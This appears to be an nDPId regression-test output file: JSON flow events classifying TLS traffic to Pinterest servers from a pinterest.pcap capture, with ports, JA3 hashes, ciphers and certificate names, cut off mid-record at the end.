-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":127,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.c
o.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":154,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinte
